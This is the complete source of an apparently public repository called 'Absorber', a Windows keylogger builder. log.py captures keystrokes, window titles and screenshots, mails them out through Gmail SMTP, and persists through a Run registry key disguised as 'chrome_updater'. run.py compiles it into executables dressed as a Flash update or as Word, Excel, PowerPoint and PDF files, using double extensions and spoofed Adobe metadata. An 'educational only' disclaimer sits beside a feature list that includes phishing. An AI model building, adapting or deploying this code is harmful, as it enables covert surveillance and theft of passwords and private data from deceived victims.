├── requirements.txt
├── Icons
├── pdf.ico
├── excel.ico
├── flash.ico
├── word.ico
└── powerpoint.ico
├── Version
├── pdf.ver
├── word.ver
├── excel.ver
├── powerpoint.ver
└── adobe.ver
├── Readme.md
├── LICENSE.md
├── Manifest
└── manifest.manifest
├── Template
└── log.py
└── run.py
/requirements.txt:
--------------------------------------------------------------------------------
1 | pyinstaller
2 | keyboard
3 | mss
4 |
--------------------------------------------------------------------------------
/Icons/pdf.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/usama7628674/Absorber/HEAD/Icons/pdf.ico
--------------------------------------------------------------------------------
/Icons/excel.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/usama7628674/Absorber/HEAD/Icons/excel.ico
--------------------------------------------------------------------------------
/Icons/flash.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/usama7628674/Absorber/HEAD/Icons/flash.ico
--------------------------------------------------------------------------------
/Icons/word.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/usama7628674/Absorber/HEAD/Icons/word.ico
--------------------------------------------------------------------------------
/Icons/powerpoint.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/usama7628674/Absorber/HEAD/Icons/powerpoint.ico
--------------------------------------------------------------------------------
/Version/pdf.ver:
--------------------------------------------------------------------------------
1 | VSVersionInfo(
2 | ffi=FixedFileInfo(
3 | filevers=(6, 1, 7601, 17514),
4 | prodvers=(6, 1, 7601, 17514),
5 | mask=0x3f,
6 | flags=0x0,
7 | OS=0x40004,
8 | fileType=0x1,
9 | subtype=0x0,
10 | date=(0, 0)
11 | ),
12 | kids=[
13 | StringFileInfo(
14 | [
15 | StringTable(
16 | u'040904B0',
17 | [StringStruct(u'CompanyName', u''),
18 | StringStruct(u'FileDescription', u'PDF File'),
19 | StringStruct(u'FileVersion', u''),
20 | StringStruct(u'InternalName', u''),
21 | StringStruct(u'LegalCopyright', u''),
22 | StringStruct(u'OriginalFilename', u''),
23 | StringStruct(u'ProductName', u''),
24 | StringStruct(u'ProductVersion', u'')])
25 | ]),
26 | VarFileInfo([VarStruct(u'Translation', [1033, 1200])])
27 | ]
28 | )
29 |
--------------------------------------------------------------------------------
/Version/word.ver:
--------------------------------------------------------------------------------
1 | VSVersionInfo(
2 | ffi=FixedFileInfo(
3 | filevers=(6, 1, 7601, 17514),
4 | prodvers=(6, 1, 7601, 17514),
5 | mask=0x3f,
6 | flags=0x0,
7 | OS=0x40004,
8 | fileType=0x1,
9 | subtype=0x0,
10 | date=(0, 0)
11 | ),
12 | kids=[
13 | StringFileInfo(
14 | [
15 | StringTable(
16 | u'040904B0',
17 | [StringStruct(u'CompanyName', u''),
18 | StringStruct(u'FileDescription', u'Microsoft Word Document'),
19 | StringStruct(u'FileVersion', u''),
20 | StringStruct(u'InternalName', u''),
21 | StringStruct(u'LegalCopyright', u''),
22 | StringStruct(u'OriginalFilename', u''),
23 | StringStruct(u'ProductName', u''),
24 | StringStruct(u'ProductVersion', u'')])
25 | ]),
26 | VarFileInfo([VarStruct(u'Translation', [1033, 1200])])
27 | ]
28 | )
29 |
--------------------------------------------------------------------------------
/Version/excel.ver:
--------------------------------------------------------------------------------
1 | VSVersionInfo(
2 | ffi=FixedFileInfo(
3 | filevers=(6, 1, 7601, 17514),
4 | prodvers=(6, 1, 7601, 17514),
5 | mask=0x3f,
6 | flags=0x0,
7 | OS=0x40004,
8 | fileType=0x1,
9 | subtype=0x0,
10 | date=(0, 0)
11 | ),
12 | kids=[
13 | StringFileInfo(
14 | [
15 | StringTable(
16 | u'040904B0',
17 | [StringStruct(u'CompanyName', u''),
18 | StringStruct(u'FileDescription', u'Microsoft Excel Worksheet'),
19 | StringStruct(u'FileVersion', u''),
20 | StringStruct(u'InternalName', u''),
21 | StringStruct(u'LegalCopyright', u''),
22 | StringStruct(u'OriginalFilename', u''),
23 | StringStruct(u'ProductName', u''),
24 | StringStruct(u'ProductVersion', u'')])
25 | ]),
26 | VarFileInfo([VarStruct(u'Translation', [1033, 1200])])
27 | ]
28 | )
29 |
--------------------------------------------------------------------------------
/Version/powerpoint.ver:
--------------------------------------------------------------------------------
1 | VSVersionInfo(
2 | ffi=FixedFileInfo(
3 | filevers=(6, 1, 7601, 17514),
4 | prodvers=(6, 1, 7601, 17514),
5 | mask=0x3f,
6 | flags=0x0,
7 | OS=0x40004,
8 | fileType=0x1,
9 | subtype=0x0,
10 | date=(0, 0)
11 | ),
12 | kids=[
13 | StringFileInfo(
14 | [
15 | StringTable(
16 | u'040904B0',
17 | [StringStruct(u'CompanyName', u''),
18 | StringStruct(u'FileDescription', u'Microsoft Powerpoint Presentation'),
19 | StringStruct(u'FileVersion', u''),
20 | StringStruct(u'InternalName', u''),
21 | StringStruct(u'LegalCopyright', u''),
22 | StringStruct(u'OriginalFilename', u''),
23 | StringStruct(u'ProductName', u''),
24 | StringStruct(u'ProductVersion', u'')])
25 | ]),
26 | VarFileInfo([VarStruct(u'Translation', [1033, 1200])])
27 | ]
28 | )
29 |
--------------------------------------------------------------------------------
/Version/adobe.ver:
--------------------------------------------------------------------------------
1 | VSVersionInfo(
2 | ffi=FixedFileInfo(
3 | filevers=(2, 0, 0, 332),
4 | prodvers=(2, 0, 0, 332),
5 | mask=0x3f,
6 | flags=0x0,
7 | OS=0x40004,
8 | fileType=0x1,
9 | subtype=0x0,
10 | date=(0, 0)
11 | ),
12 | kids=[
13 | StringFileInfo(
14 | [
15 | StringTable(
16 | u'040904B0',
17 | [StringStruct(u'CompanyName', u'Adobe Systems Incorporated'),
18 | StringStruct(u'FileDescription', u'Adobe Download Manager'),
19 | StringStruct(u'FileVersion', u'2.0.0.332'),
20 | StringStruct(u'InternalName', u'Adobe Download Manager'),
21 | StringStruct(u'LegalCopyright', u'Copyright 2018 Adobe Systems Incorporated. All rights reserved.'),
22 | StringStruct(u'OriginalFilename', u'Adobe Download Manager'),
23 | StringStruct(u'ProductName', u'Adobe Download Manager'),
24 | StringStruct(u'ProductVersion', u'2.0.0.332s')])
25 | ]),
26 | VarFileInfo([VarStruct(u'Translation', [1033, 1200])])
27 | ]
28 | )
29 |
--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
1 | ### Absorber
2 | It records all keystrokes including some special keys and send them to gmail.
3 |
4 |
5 | ## DISCLAIMER
6 |
7 |
8 | TO BE USED FOR EDUCATIONAL PURPOSES ONLY
9 |
10 |
11 | The use of the Absorber & its resources is **COMPLETE RESPONSIBILITY of the END-USER**. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Also we inform you that some of your your actions may be **ILLEGAL** and you **CAN NOT** use this software to test person or company without **WRITTEN PERMISSION** from them.
12 |
13 |
14 |
15 | ### Things you need
16 | * Windows
17 | * python 3.5
18 |
19 | ### Features
20 | * Send logs each 120 seconds.
21 | * Send logs when chars > 20.
22 | * Send logs with GMAIL.
23 | * Multiple Session disabled.
24 | * Auto Persistence.
25 | * Some Phishing methods are included.
26 | * Self-destruct
27 | * Takes screenshot
28 |
29 |
30 | ## HOW TO INSTALL
31 | ```
32 | pip install -r requirements.txt
33 | ```
34 |
35 |
36 | ## How to run
37 | ```
38 | python run.py
39 | ```
40 |
41 |
--------------------------------------------------------------------------------
/LICENSE.md:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2018 Usama Abdul Sattar
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/Manifest/manifest.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
8 | WinRAR SFX module
9 |
10 |
11 |
12 |
14 |
15 |
16 |
17 |
18 |
19 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 | true
45 |
46 |
47 |
48 |
49 |
--------------------------------------------------------------------------------
/Template/log.py:
--------------------------------------------------------------------------------
1 | from keyboard import on_press, wait
2 | from email.mime.multipart import MIMEMultipart
3 | from email.mime.text import MIMEText
4 | from email.mime.base import MIMEBase
5 | from email.mime.image import MIMEImage
6 | from email import encoders
7 | from win32gui import GetWindowText, GetForegroundWindow
8 | import win32event, win32api, winerror
9 | from datetime import datetime
10 | from threading import Thread
11 | from time import sleep
12 | import mss
13 | import mss.tools
14 | import smtplib
15 | import sys
16 | import shutil
17 | from winreg import *
18 | import os
19 |
20 |
21 |
22 | instance = win32event.CreateMutex(None, 1, 'NOSIGN')
23 | if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
24 | instance = None
25 | exit()
26 |
27 | dir = r"C:\Users\Public\Libraries\adobe_flash_player.exe"
28 |
29 | def startup():
30 | shutil.copy(sys.argv[0], dir)
31 | aReg = ConnectRegistry(None, HKEY_CURRENT_USER)
32 | aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
33 | SetValueEx(aKey,"chrome_updater", 0, REG_SZ, dir)
34 | if not os.path.isfile(dir):
35 | startup()
36 |
37 |
38 | if (dst <= str(datetime.now())[:10]):
39 | pth = r"del /q C:\Users\Public\Libraries\adobe_flash_player.exe"
40 | dlt = r"del /q C:\Users\Public\Libraries\del.cmd"
41 | f = open(r"C:\Users\Public\Libraries\del.cmd","w+")
42 | f.write('''
43 | taskkill /f /im "adobe_flash_player.exe" ''' + '\n' + pth + '\n' + '''
44 | reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v chrome_updater /f
45 | ''' + '\n' + dlt)
46 | f.close()
47 | os.system(r"C:\Users\Public\Libraries\del.cmd")
48 | else:
49 | pass
50 |
51 |
52 | data = ''
53 | lastwindow = ''
54 |
55 | def Screenshot():
56 | with mss.mss() as sct:
57 | monitor = sct.monitors[1]
58 | im = sct.grab(monitor)
59 | raw_bytes = mss.tools.to_png(im.rgb, im.size)
60 | return raw_bytes
61 |
62 | def send_mail():
63 | global data,lastwindow
64 | while True:
65 | if len(data) > 20:
66 | timeInSecs = datetime.now()
67 | PASS = PAS
68 | FROM = FRM
69 | TO = FRM
70 | SUBJECT = "ABSORBER"
71 | MESSAGE = '' + ' [' + lastwindow + '] ' + ''+ data
72 | msg = MIMEMultipart()
73 | msg.attach(MIMEText(MESSAGE, 'html'))
74 | MimeImg = MIMEImage(Screenshot())
75 | MimeImg.add_header('Content-Disposition', 'attachment', filename="screenshot.png")
76 | msg.attach(MimeImg)
77 | text = msg.as_string()
78 | try:
79 | server = smtplib.SMTP("smtp.gmail.com",587)
80 | server.ehlo()
81 | server.starttls()
82 | server.ehlo()
83 | server.login(FROM, PASS)
84 | server.sendmail(FROM, TO, text)
85 | lastwindow = ''
86 | data = ''
87 | MESSAGE = ''
88 | text = ''
89 | msg = ''
90 | server.quit()
91 | except Exception as error:
92 | print(error)
93 | sleep(120)
94 |
95 |
96 | def display(event, key):
97 | global data, lastwindow
98 | if lastwindow != GetWindowText(GetForegroundWindow()):
99 | lastwindow = GetWindowText(GetForegroundWindow())
100 | #data += ' [ ' + lastwindow + ' ] '
101 | if key == 'tab' or key == 'caps lock' or key == 'shift' or key == 'ctrl' or key == 'alt' or key == 'space' or key == 'right alt' or key == 'right ctrl' or key == 'esc' or key == 'left' or key == 'right' or key == 'down' or key == 'up' or key == 'right shift' or key == 'enter' or key == 'backspace' or key == 'num lock' or key == 'page up' or key == 'page down' or key == 'insert' or key == 'delete' or key == 'print screen' or key == 'home' or key == 'end' or key == 'decimal':
102 | data += ' { ' + str(key) + ' } '
103 | else:
104 | data += key
105 | elif key == 'tab' or key == 'caps lock' or key == 'shift' or key == 'ctrl' or key == 'alt' or key == 'space' or key == 'right alt' or key == 'right ctrl' or key == 'esc' or key == 'left' or key == 'right' or key == 'down' or key == 'up' or key == 'right shift' or key == 'enter' or key == 'backspace' or key == 'num lock' or key == 'page up' or key == 'page down' or key == 'insert' or key == 'delete' or key == 'print screen' or key == 'home' or key == 'end' or key == 'decimal':
106 | data += ' { ' + str(key) + ' } '
107 | else:
108 | data += key
109 |
110 | def KeyPressed(event):
111 | display(event, event.name)
112 |
113 |
114 |
115 | if __name__ == '__main__':
116 | triggerThread = Thread(target=send_mail,daemon=True)
117 | triggerThread.start()
118 |
119 | on_press(KeyPressed)
120 | wait()
121 |
--------------------------------------------------------------------------------
/run.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | from datetime import datetime, timedelta
4 | from getpass import getpass
5 |
6 | BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
7 | header = ('{0}Absorber{1} > {2}'.format(YELLOW, WHITE, END))
8 |
9 | os.system('cls')
10 | print("""
11 | █████╗ ██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗
12 | ██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔══██╗██╔════╝██╔══██╗
13 | ███████║██████╔╝███████╗██║ ██║██████╔╝██████╔╝█████╗ ██████╔╝
14 | ██╔══██║██╔══██╗╚════██║██║ ██║██╔══██╗██╔══██╗██╔══╝ ██╔══██╗
15 | ██║ ██║██████╔╝███████║╚██████╔╝██║ ██║██████╔╝███████╗██║ ██║
16 | ╚═╝ ╚═╝╚═════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝
17 | """)
18 | print ('\n {0}WARNING: Enable access to less secure apps on your email account.{2} \n -> * ONLY WORK WITH GMAIL * :\n {1}https://www.google.com/settings/security/lesssecureapps{2}'.format(RED, GREEN, END))
19 | print('\n')
20 | os.system('copy Template\log.py .\log.py >nul')
21 | email = input(BLUE + 'Enter your email: ' + END)
22 | passd = getpass(BLUE + 'Enter your password: ' + END)
23 |
24 |
25 | chk = input(BLUE + "\nDo you want to add self-destruction [y/n] \n" + header + END)
26 | if chk == "y" or chk == "Y":
27 | days = int(input(BLUE + "No. of days after you want this keylogger to self-destruct (ex. 2) \n" + header + END))
28 | if days <= 0:
29 | print("Days should be greater than 0")
30 | sys.exit()
31 | else:
32 | tme = str(datetime.now() + timedelta(days))[:10]
33 | f = open('log.py','r+')
34 | readcontent = f.read()
35 | f.seek(0, 0)
36 | f.write('FRM = ' + "'" + email + "'" + '\n' + 'PAS = ' + "'" + passd + "'" + '\n' + 'dst= ' + "'" + tme + "'" + '\n' + readcontent)
37 | f.close()
38 | else:
39 | f = open('log.py','r+')
40 | readcontent = f.read()
41 | f.seek(0, 0)
42 | f.write('FRM = ' + "'" + email + "'" + '\n' + 'PAS = ' + "'" + passd + "'" + '\n' + 'dst= ' + " 'None' " + '\n' + readcontent)
43 | f.close()
44 |
45 | os.system('cls')
46 | print ('\n {0}[{1}1{0}]{1} Adobe Flash Update '.format(BLUE, WHITE) + '\n' + ' {0}[{1}2{0}]{1} Fake Word docx '.format(BLUE, WHITE) + '\n' + ' {0}[{1}3{0}]{1} Fake Excel xlsx '.format(BLUE, WHITE) + '\n' + ' {0}[{1}4{0}]{1} Fake Powerpoint pptx '.format(BLUE, WHITE) + '\n' + ' {0}[{1}5{0}]{1} Fake Acrobat pdf '.format(BLUE, WHITE) + '\n' + ' {0}[{1}6{0}]{1} Blank Executable \n'.format(BLUE, WHITE))
47 |
48 |
49 | choice = input(header)
50 |
51 | if choice == '1':
52 | name = 'abs_Flash.exe'
53 | os.system('rmdir /S /Q dist 2>nul')
54 | os.system('pyinstaller --noconsole -m Manifest/manifest.manifest --version-file=Version/adobe.ver -i Icons/flash.ico -F log.py')
55 | os.system('rmdir /S /Q build __pycache__')
56 | os.system('del log.py log.spec')
57 | os.rename('dist/log.exe', 'dist/' + name)
58 | os.system('cls')
59 | print('{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name)
60 | sys.exit()
61 |
62 | elif choice == '2':
63 | name = 'abs_Word.docx.exe'
64 | os.system('rmdir /S /Q dist 2>nul')
65 | os.system('pyinstaller --noconsole -m Manifest/manifest.manifest --version-file=Version/word.ver -i Icons/word.ico -F log.py')
66 | os.system('rmdir /S /Q build __pycache__')
67 | os.system('del log.py log.spec')
68 | os.rename('dist/log.exe', 'dist/' + name)
69 | os.system('cls')
70 | print('{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name)
71 | sys.exit()
72 |
73 | elif choice == '3':
74 | name = 'abs_Excel.xlsx.exe'
75 | os.system('rmdir /S /Q dist 2>nul')
76 | os.system('pyinstaller --noconsole -m Manifest/manifest.manifest --version-file=Version/excel.ver -i Icons/excel.ico -F log.py')
77 | os.system('rmdir /S /Q build __pycache__')
78 | os.system('del log.py log.spec')
79 | os.rename('dist/log.exe', 'dist/' + name)
80 | os.system('cls')
81 | print('{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name)
82 | sys.exit()
83 |
84 | elif choice == '4':
85 | name = 'abs_powerpoint.pptx.exe'
86 | os.system('rmdir /S /Q dist 2>nul')
87 | os.system('pyinstaller --noconsole -m Manifest/manifest.manifest --version-file=Version/powerpoint.ver -i Icons/powerpoint.ico -F log.py')
88 | os.system('rmdir /S /Q build __pycache__')
89 | os.system('del log.py log.spec')
90 | os.rename('dist/log.exe', 'dist/' + name)
91 | os.system('cls')
92 | print('{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name)
93 | sys.exit()
94 |
95 | elif choice == '5':
96 | name = 'abs_pdf.pdf.exe'
97 | os.system('rmdir /S /Q dist 2>nul')
98 | os.system('pyinstaller --noconsole -m Manifest/manifest.manifest --version-file=Version/pdf.ver -i Icons/pdf.ico -F log.py')
99 | os.system('rmdir /S /Q build __pycache__')
100 | os.system('del log.py log.spec')
101 | os.rename('dist/log.exe', 'dist/' + name)
102 | os.system('cls')
103 | print('{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name)
104 | sys.exit()
105 |
106 | elif choice == '6':
107 | name = 'absorber.exe'
108 | os.system('rmdir /S /Q dist 2>nul')
109 | os.system('pyinstaller --noconsole -m Manifest/manifest.manifest -F log.py')
110 | os.system('rmdir /S /Q build __pycache__')
111 | os.system('del log.py log.spec')
112 | os.rename('dist/log.exe', 'dist/' + name)
113 | os.system('cls')
114 | print('{0}[*] Saved to: {1}'.format(GREEN, END) + 'dist/' + name)
115 | sys.exit()
116 |
117 | else:
118 | sys.exit(RED + 'Wrong choice.Please enter right choice next time.' + END)
119 |
--------------------------------------------------------------------------------